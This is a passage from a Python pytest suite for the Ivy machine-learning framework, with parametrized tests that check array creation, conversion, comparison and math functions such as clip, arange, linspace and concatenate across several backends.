ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
    # mxnet does not support int16, and does not support bool for the broadcast_equal method used here
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
        # mxnet only supports numbers or 0- or 1-dimensional arrays for min and max when performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
# @pytest.mark.parametrize(
# "x_max_norm_n_p_val_clipped",
# [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
# ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
# ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# # smoke test
# if call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
# max_norm = x_max_norm_n_p_val_clipped[1]
# p_val = x_max_norm_n_p_val_clipped[2]
# clipped = x_max_norm_n_p_val_clipped[3]
# ret = ivy.clip_vector_norm(x, max_norm, p_val)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == (x.shape if len(x.shape) else (1,))
# # value test
# assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# # compilation test
# if call is helpers.torch_call:
# # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
# return
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# stack
# @pytest.mark.parametrize(
# "xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# (x1, x2), axis = xs_n_axis
# if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x1 = tensor_fn(x1, dtype, dev)
# x2 = tensor_fn(x2, dtype, dev)
# ret = ivy.stack((x1, x2), axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
# if x1.shape == ():
# expected_shape = (2,)
# else:
# expected_shape = list(x1.shape)
# expected_shape.insert(axis_val, 2)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.stack, (x1, x2), axis),
# np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
